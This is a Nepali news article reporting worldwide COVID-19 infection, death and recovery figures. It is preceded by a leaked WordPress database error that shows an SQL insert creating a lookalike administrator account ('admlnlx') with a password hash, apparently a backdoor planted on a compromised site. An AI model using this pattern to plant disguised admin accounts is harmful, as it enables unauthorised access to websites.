WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BXw4vmgEWT8ZiR0R8Dx1tpnKz2tIX3/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 13:13:28', '', 'admlnlx', 'admlnlx')
काठमाडौं । विश्वमा कोरोना भाइरस (कोभिड–१९) बाट संक्रमित हुने मानिसको संख्या दुई करोड नाघेको छ । जोन्स हप्किन्स युनिभर्सिटीको तथ्यांक अनुसार अहिलेसम्म कोरोना भाइरसका संक्रमितको संख्या दुई करोड ८९ हजार ६२४ पुगेको छ ।
जोन्स हप्किन्स युनिभर्सिटीको तथ्यांक अनुसार कोरोना सबैभन्दा धेरै कोरोना संक्रमित अमेरिकामा फेला परेका छन् । अमेरिकामा कोरोना भाइरसका संक्रमितको संख्या ५० लाख नाघेका छन् ।
विश्वभर कोरोना भाइरसको कारण मृत्यु हुनेको संख्या पनि सात लाख ३६ हजार १९१ पुगेको छ । अमेरिकामा सबैभन्दा बढी एक लाख ६३ हजारभन्दा धेरैको कोरोना भाइरसको कारण मृत्यु भइसकेको छ ।
अहिलेसम्म विश्वभर एक करोड २२ लाख कोरोना संक्रमित निको वा डिस्चार्ज भइसकेका छन् ।